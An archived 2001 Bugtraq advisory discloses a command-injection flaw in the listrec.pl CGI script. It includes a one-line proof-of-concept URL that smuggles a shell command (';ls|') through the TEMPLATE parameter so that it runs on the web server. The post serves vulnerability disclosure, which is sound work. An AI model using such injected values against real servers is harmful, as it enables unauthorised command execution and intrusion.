Textor Webmasters Ltd (listrec.pl)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

To: bugtraq@securityfocus.com
Subject: Textor Webmasters Ltd (listrec.pl)
From: Alexey Sintsov <don_huan@xakep.ru>
Date: 12 Sep 2001 04:01:24 -0000
Sender: don_huan@xakep.ru

Last update (of listrec.pl) Jon Wright 11/11/1998.

This script has vulnerability (does not filter input of the 
user) which allows to carry out commands from 
WebServer.

EXPLOIT:
www.server.com/cgi-bin/common/listrec.pl?
APP=qmh-news&TEMPLATE=;ls| 

XP-TEAM

Prev by Date: Re: Draft Bill on privacy/security -- requires certified security technologies in all devices
Next by Date: Re: More security problems in Apache on Mac OS X
Previous by thread: mailto links
Next by thread: [SNS Advisory No.42] Trend Micro InterScan eManager for NT Multiple Program Buffer Overflow Vulnerability
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux